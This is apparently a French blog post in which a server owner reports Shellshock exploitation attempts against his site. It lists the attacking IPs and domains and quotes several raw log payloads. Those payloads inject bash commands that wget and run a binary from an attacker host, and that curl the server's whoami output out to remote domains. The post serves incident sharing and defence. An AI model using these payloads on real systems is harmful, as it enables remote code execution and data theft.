Sécurité : shellshock …

3827 x served & 241 x viewed

Attaque sur mon serveur :

WinInet Test
curl/7.19.7 (i386-redhat-linux-gnu) libcurl/7.19.7 NSS/3.13.6.0 zlib/1.2.3 libidn/1.18 libssh2/1.4.2 cURL
() { :;}; /bin/bash -c \\ »wget http://ntontomou.com/s ;chmod +x s ; ./s\\« 

Un petit Whois sur : http://www.ntontomou.com/ : https://who.is/whois/ntontomou.com …. il reste plus qu’a contacter http://www.enom.com. Misère.

D’après les logs c’est pas son premier essai :

() { :;}; /bin/bash -c \ »curl http://ntontomou.com/custom/ping.php?domain=sphinux.org\\&whoami=`whoami`\ »

D’abord du PHP puis maintenant un soft en C.

Pour plus d’information sur shellshock : http://linuxfr.org/news/une-faille-nommee-shellshock

Et c’est pas le seul :

  • 2.133.128.30 : KZ : IP_Zebra_Telecom.
  • 37.1.207.83 : NL :
  • ntontomou.com : PA :
  • best-home-based-business-idea.com : CN :

Dans les logs :

() { :;}; /bin/bash -c \"curl -O http://37.1.207.83/log.php?get=aHR0cDovL2JlbGxldnVlaG91c2UuY29tLw==\"
 () { :;}; /bin/bash -c \"curl http://ntontomou.com/custom/ping.php?domain=bellevuehouse.com\\&whoami=`whoami`\"
() { :;}; /bin/bash -c \"wget http://ntontomou.com/custom/ping.php?domain=bellevuehouse.com\\&whoami=`whoami`\"
() { :;}; echo; /usr/bin/wget http://2.133.128.30/robots.txt?http://www.1001vrs.com/cgi-bin/directories/counter/countcombb.pl
() { :;};echo kp8i7xybgo7htfu0hge3$(curl 'http://best-home-based-business-idea.com/bash_count.php?%62%65%6C%6C%65%76%75%65%68

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Time limit is exhausted. Please reload CAPTCHA.